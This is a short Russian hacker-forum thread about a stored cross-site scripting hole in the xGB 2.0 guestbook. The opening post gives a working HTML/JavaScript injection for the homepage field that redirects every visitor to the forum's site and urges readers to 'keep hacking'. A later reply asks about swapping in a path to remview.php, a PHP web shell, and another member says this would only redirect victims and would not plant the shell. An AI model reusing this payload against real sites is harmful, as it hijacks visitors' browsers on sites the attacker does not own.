Уязвимость гостевой книги  xgb 2.0

Discussion in 'Уязвимости' started by Егорыч+++, 18 May 2004.

  1. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    xGB 2.0 - гостевая книга. Все в ней хорошо, но скрипты пропускает. В homepage вставляем следующее

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">'<a style=background-image:url(javascript:navigate('http://antichat.ru'));></a>[/QUOTE]<span id='postcolor'>

    И получаем редирект на сайт АНТИЧАТ.

    http://www.x-dev.de/

    Ломаем дальше...
     
    #1 Егорыч+++, 18 May 2004
  2. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    мда уже не пропускают скрипт &nbsp;[​IMG]
     
    #2 m0nzt3r, 3 Sep 2004
  3. .::CC::.

    .::CC::. New Member

    Joined:
    9 Mar 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Привет! Я тут новенький...и у меня есть пара вопросов по взлому гостевой:
    1. А что нужно вставлять вместо " Исходный код" ?
    2. Могу я допустим вместо строчки Antichat.ru, прописать путь где у меня лежит remview.php?
    Заранее пасиба!
     
    #3 .::CC::., 10 Mar 2005
  4. KEZ

    KEZ Guest

    Reputations:
    0
    1. Нужно вставлять исходный код. Как ещё сказать?
    2. Можешь. Только смысл - ты попадешь на сайт на котором лежит ремвью.
    Ты не думаешь что он загрузиться на сайт жерты? ))
    3. Рас новенький то лутше в Pm писать
     
    #4 KEZ, 10 Mar 2005
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.